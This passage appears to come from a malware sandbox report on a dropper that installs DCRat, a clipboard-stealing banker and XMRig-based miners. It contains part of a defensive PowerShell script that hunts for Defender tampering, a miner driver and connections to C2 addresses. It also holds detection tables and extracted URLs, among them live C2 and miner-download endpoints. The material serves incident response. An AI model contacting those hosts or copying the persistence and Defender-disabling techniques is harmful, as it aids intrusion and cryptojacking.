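            [pscustomobject]@{ Check = 'DefenderExclusion'; Value = $ex; Detail = '' }
        }
    }
    if ($pref.DisableRealtimeMonitoring -or $pref.DisableBehaviorMonitoring -or $pref.DisableIOAVProtection) {
        [pscustomobject]@{ Check = 'DefenderDisabled'; Value = 'MpPreference'
                           Detail = "RealTime=$($pref.DisableRealtimeMonitoring) Behavior=$($pref.DisableBehaviorMonitoring) IOAV=$($pref.DisableIOAVProtection)" }
    }
}

function Get-WinRing0Driver {
    # migrate.exe drops WinRing0x64.sys, the driver XMRig ships for MSR access; look for it as a registered driver.
    Get-CimInstance -ClassName Win32_SystemDriver -ErrorAction SilentlyContinue |
        Where-Object { "$($_.Name) $($_.PathName)" -match '(?i)WinRing0' } |
        ForEach-Object { [pscustomobject]@{ Check = 'KernelDriver'; Value = $_.PathName; Detail = "State=$($_.State)" } }
}

function Get-C2Connections {
    # Live TCP connections to the infrastructure contacted during the sandbox run.
    Get-NetTCPConnection -ErrorAction SilentlyContinue |
        Where-Object { $_.RemoteAddress -in $ReportIocs.RemoteIps } |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{ Check = 'C2Connection'; Value = "$($_.RemoteAddress):$($_.RemotePort)"
                               Detail = "pid=$($_.OwningProcess) $($proc.ProcessName)" }
        }
}

$findings = @(Get-DroppedFileMatches) + @(Get-SuspiciousAutoruns) + @(Get-DefenderTampering) +
            @(Get-WinRing0Driver) + @(Get-C2Connections)
if ($findings.Count -eq 0) { Write-Output 'No artifacts from this report found on this host.' }
else { $findings | Format-Table -Property Check, Value, Detail -AutoSize -Wrap }
```

The checks are deliberately independent so that a partial hit still surfaces: the miner may have been killed but the Run key, the Defender exclusion and WinRing0x64.sys usually survive a reboot, and a Run key value that resolves into C:\Windows\Tasks or C:\Windows\INF is a strong signal on its own even when the binary has been renamed.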

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
IYXE4Uz61k.exe | 34% | ReversingLabs | Win32.Trojan.AvKiller

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\Desktop\UtDRkwHy.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\KbrUPpvT.log | 100% | Avira | HEUR/AGEN.1300079
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe | 100% | Avira | TR/ClipBanker.zcrtc
C:\Users\user\AppData\Local\Temp\EekRrdxVrk.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\OShKWlwM.log | 100% | Avira | HEUR/AGEN.1362695
C:\Users\user\Desktop\IIxTfkxV.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\DmmmRJbk.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\QLwtIihK.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\IZEltFrY.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\UtDRkwHy.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\KbrUPpvT.log | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\OShKWlwM.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\DmmmRJbk.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\Aepdvrho.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\QLwtIihK.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\fZypqYbb.log | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe | 39% | ReversingLabs | Win64.Infostealer.ClipBanker
C:\ProgramData\migrate.exe | 8% | ReversingLabs |
C:\Users\user\Desktop\Aepdvrho.log | 8% | ReversingLabs |
C:\Users\user\Desktop\AtXEfMql.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\DmmmRJbk.log | 17% | ReversingLabs |
C:\Users\user\Desktop\EjOumJqe.log | 8% | ReversingLabs |
C:\Users\user\Desktop\HcddYGcd.log | 4% | ReversingLabs |
C:\Users\user\Desktop\IIxTfkxV.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IZEltFrY.log | 5% | ReversingLabs |
C:\Users\user\Desktop\KbrUPpvT.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\OIKLmzcP.log | 25% | ReversingLabs |
C:\Users\user\Desktop\OShKWlwM.log | 17% | ReversingLabs |
C:\Users\user\Desktop\QLwtIihK.log | 25% | ReversingLabs |
C:\Users\user\Desktop\UBnkPfhE.log | 12% | ReversingLabs |
C:\Users\user\Desktop\UtDRkwHy.log | 4% | ReversingLabs |
C:\Users\user\Desktop\bjHzibbh.log | 8% | ReversingLabs |
C:\Users\user\Desktop\brrRNKBn.log | 25% | ReversingLabs |
C:\Users\user\Desktop\fZypqYbb.log | 21% | ReversingLabs |
C:\Users\user\Desktop\hbkYLHfW.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\mFfXERcN.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\quigFLkP.log | 21% | ReversingLabs |
C:\Users\user\Desktop\sPPOvTaE.log | 29% | ReversingLabs |
C:\Users\user\Desktop\syIwhxhC.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\tvjECxvw.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\vrXfSuSA.log | 16% | ReversingLabs |
C:\Windows\Bridgeprovider.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\INF\MicrosoftDefenger.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\Tasks\1.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
C:\Windows\Tasks\ApplicationsFrameHost.exe | 62% | ReversingLabs | Win64.Trojan.Miner
C:\Windows\Tasks\IntelConfigService.exe | 56% | ReversingLabs | Win64.Trojan.AitMiner
C:\Windows\Tasks\MSTask.exe | 54% | ReversingLabs | Win64.Trojan.Malgent
C:\Windows\Tasks\MicrosoftPrt.exe | 39% | ReversingLabs | Win64.Infostealer.ClipBanker
C:\Windows\Tasks\Superfetch.exe | 68% | ReversingLabs | Win64.Trojan.Malxmr
C:\Windows\Tasks\WinRing0x64.sys | 5% | ReversingLabs |
C:\Windows\Tasks\Wmiic.exe | 74% | ReversingLabs | Win64.Trojan.Skeeyah
C:\Windows\Tasks\Wrap.exe | 65% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\_MEI81722\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_bz2.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_ctypes.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_hashlib.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_lzma.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_queue.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_socket.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\_ssl.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\libcrypto-1_1.dll | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\libffi-7.dll | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\libssl-1_1.dll | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\python3.dll | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\python38.dll | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\select.pyd | 0% | ReversingLabs |
C:\Windows\Temp\_MEI81722\unicodedata.pyd | 0% | ReversingLabs |

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches
URLs
Source | Detection | Scanner | Label
http://crl.mic | 0% | Avira URL Cloud | safe
http://185.17.0.139:8081/client/setClientConfig?clientId=124406 | 0% | Avira URL Cloud | safe
https://github.co8 | 0% | Avira URL Cloud | safe
http://crl.micB | 0% | Avira URL Cloud | safe
http://45.137.64.40/miners/v.txt | 0% | Avira URL Cloud | safe
http://45.137.64.40/miners/miners.txt | 0% | Avira URL Cloud | safe
http://45.137.64.40/miners/v.txt_inspect.py? | 0% | Avira URL Cloud | safe
http://185.17.0.139:8081/client/setClientStatus?clientId=124406 | 0% | Avira URL Cloud | safe
http://45.137.64.40/miners/miners.txtz | 0% | Avira URL Cloud | safe
http://json.org | 0% | Avira URL Cloud | safe
http://45.137.64.40/miners/miners.txtindex | 0% | Avira URL Cloud | safe
http://greenbytes.de/tech/tc2231/ | 0% | Avira URL Cloud | safe
https://cryptography.io | 0% | Avira URL Cloud | safe
Contacted Domains
No contacted domains info

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.17.0.139:8081/client/setClientConfig?clientId=124406 | true | Avira URL Cloud: safe | unknown
http://185.17.0.139:8081/client/setClientStatus?clientId=124406 | true | Avira URL Cloud: safe | unknown
http://45.137.64.40/miners/v.txt | false | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://google.com/ | MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://mahler:8092/site-updates.py | MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html | MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/giampaolo/psutil/issues/875. | MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.../back.jpeg | MSTask.exe, 0000003E.00000002.4151834766.00000268D2050000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://cloud.google.com/appengine/docs/standard/runtimes | MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography | MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cryptography.io/ | MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy | MSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.python.org/ | MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://httpbin.org/post | MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography/ | MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Ousret/charset_normalizer | MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/urllib3/urllib3/issues/497 | MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://pypi.python.org/pypi/wget/ | MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://bitbucket.org/techtonik/python-wget/ | MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://bitbucket.org/techtonik/python-pager | MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.python.org/download/releases/2.3/mro/. | MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography/actions?query=workflow%3ACI | MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/BenDr0id/xmrigCC/ | Wrap.exe | false | | high
http://45.137.64.40/miners/v.txt_inspect.py? | MSTask.exe, 0000003E.00000002.4149243495.00000268D17A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://goo.gl/zeJZl. | MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://tools.ietf.org/html/rfc2388#section-4.4 | MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.apache.org/licenses/LICENSE-2.0 | MSTask.exe, 00000038.00000003.1917495670.00000286A4AD1000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 00000038.00000003.1917367520.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp; MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Bendr0id/xmrigCC/blob/master/doc/ALGORITHMS.md) | ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmp | false | |
                                                                                    high
                                                                                    http://yahoo.com/MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 
00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drfalse
                                                                                          high
                                                                                          https://w3c.github.io/html/sec-forms.html#multipart-form-dataMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cryptography.io/en/latest/changelog/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://45.137.64.40/miners/miners.txtzMSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://mail.python.org/mailman/listinfo/cryptography-devMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://requests.readthedocs.ioMSTask.exe, 0000003E.00000002.4151999223.00000268D2110000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://curl.haxx.se/rfc/cookie_spec.htmlMSTask.exe, 0000003E.00000002.4151888834.00000268D2090000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.python.org/dev/peps/pep-0205/MSTask.exe, 00000038.00000003.1916592166.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151133313.00000268D1D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://json.orgMSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688MSTask.exe, 0000003E.00000002.4148600389.00000268D1100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://httpbin.org/getMSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://httpbin.org/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.python.orgMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://ocsp.thawte.com0MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 
00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drfalse
                                                                                                                  high
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerMSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.micMSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsMSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151258677.00000268D1DD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://mail.python.org/pipermail/python-dev/2012-June/120787.html.MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://httpbin.org/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.apache.org/licenses/MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://twitter.com/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://stackoverflow.com/questions/4457745#4457745.MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535MSTask.exe, 0000003E.00000002.4150608257.00000268D1C7D000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cryptography.io/en/latest/installation/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syMSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.co8MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://45.137.64.40/miners/miners.txtMSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://img.shields.io/pypi/v/cryptography.svgMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://google.com/mail/MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://wwwsearch.sf.net/):MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/BenDr0id/xmrigCC/Dmigrate.exe, 0000001A.00000003.1846671612.00000000076C4000.00000004.00000020.00020000.00000000.sdmp, Wrap.exe, 0000002A.00000002.4147802066.00007FF726D2E000.00000002.00000001.01000000.0000000C.sdmp, ApplicationsFrameHost.exe, 00000035.00000000.1907411028.00007FF6A9D02000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://crl.micBMSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://tools.ietf.org/html/rfc6125#section-6.4.3MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cryptography.io/en/latest/security/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.openssl.org/HMSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4153579722.00007FFDFB339000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://45.137.64.40/miners/miners.txtindexMSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://greenbytes.de/tech/tc2231/MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyMSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://cryptography.ioMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://github.com/pyca/cryptography/issuesMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://readthedocs.org/projects/cryptography/badge/?version=latestMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://google.com/mailMSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
